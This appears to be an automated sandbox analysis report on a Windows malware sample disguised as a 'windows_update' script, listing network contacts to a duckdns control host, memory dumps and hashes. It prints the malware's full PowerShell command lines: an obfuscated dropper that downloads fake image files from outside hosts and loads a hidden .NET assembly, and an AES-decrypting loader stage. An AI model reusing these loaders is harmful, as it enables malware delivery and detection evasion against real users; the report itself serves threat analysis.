US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
US 8.8.8.8:53 kdfsv.duckdns.org udp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp
GB 154.30.255.175:8890 kdfsv.duckdns.org tcp

Files

memory/3212-0-0x0000020434C20000-0x0000020434C42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vg4w4iwe.dma.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3212-10-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/3212-12-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-13-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-11-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-14-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/3212-15-0x0000020419EF0000-0x0000020419F4B000-memory.dmp

memory/3212-17-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/3212-18-0x00000204347D0000-0x000002043482B000-memory.dmp

memory/3212-16-0x00000204186A0000-0x00000204186B0000-memory.dmp

memory/4904-19-0x0000029EE1770000-0x0000029EE1786000-memory.dmp

memory/4904-20-0x0000029EE32B0000-0x0000029EE32C6000-memory.dmp

memory/4904-21-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/4904-23-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-22-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-24-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/3212-27-0x00000204347D0000-0x000002043482B000-memory.dmp

memory/3212-28-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/4904-29-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp

memory/4904-30-0x00007FFB385C0000-0x00007FFB39081000-memory.dmp

memory/4904-31-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-32-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-33-0x0000029EFBDD0000-0x0000029EFBDE0000-memory.dmp

memory/4904-34-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240319-en

Max time kernel

117s

Max time network

129s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebwBkDgTreGUDgTrebgBjDgTreGsDgTrebwDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp

Files

memory/2668-4-0x000000001B220000-0x000000001B502000-memory.dmp

memory/2668-5-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2668-7-0x0000000002820000-0x0000000002828000-memory.dmp

memory/2668-6-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/2668-8-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2668-9-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/2668-10-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/2668-11-0x0000000002740000-0x00000000027C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HY769T7AS1F5GZIR22I0.temp

MD5 3f25930d6bd489dfb884d6770376f149
SHA1 5eec9cbc758bd23d2e1501ebd5d5eccec3bc4842
SHA256 04076109e1d8a772d3053f65967be14d1a05e8e553ac2ed36f6ed920502c4f69
SHA512 5bd726831e16be240af9e11af24a89bdb26ac32805fbd690df4b91bf8951d4af16677913c6f867e7dfac4ecabe6d8b047a5d5245ff086bc11e5ebc8fde06512a

memory/2460-17-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2460-18-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-19-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2460-20-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-22-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-21-0x0000000002610000-0x0000000002690000-memory.dmp

memory/2460-23-0x000000001AA90000-0x000000001AADE000-memory.dmp

memory/2460-24-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

memory/2668-25-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20231129-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1752 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 3044 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 